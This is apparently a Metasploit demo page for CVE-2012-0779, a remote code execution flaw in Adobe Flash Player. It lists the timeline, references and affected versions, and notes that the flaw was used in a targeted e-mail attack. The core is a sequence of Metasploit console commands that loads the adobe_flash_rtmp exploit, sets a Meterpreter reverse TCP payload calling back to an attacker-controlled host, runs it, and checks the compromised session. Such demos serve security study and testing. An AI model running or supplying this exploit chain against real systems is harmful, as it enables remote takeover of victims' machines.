CVE-2012-0779 / APSB12-09 Adobe Flash Player Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered exploited in the wild
Public release of the vulnerability by the vendor the 2012-05-04
Details of the vulnerability provided the 2012-05-06
Metasploit PoC provided the 2012-06-22

PoC provided by :

sinn3r
juan vazquez

Reference(s) :

CVE-2012-0779
OSVDB-81656
APSB12-09
BID-53395

Affected version(s) :

Adobe Flash Player 11.2.202.233 and earlier versions for Windows, Macintosh and Linux operating systems
Adobe Flash Player 11.1.115.7 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.8 and earlier versions for Android 3.x and 2.x

Tested on Windows XP Pro SP3 with :

Internet Explorer 6
Adobe Flash Player 11.2.202.228

Description :

This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 “_error” response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the “World Uyghur Congress Invitation.doc” e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.

Commands :

use exploit/windows/browser/adobe_flash_rtmp
set RTMPHOST 192.168.178.100
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid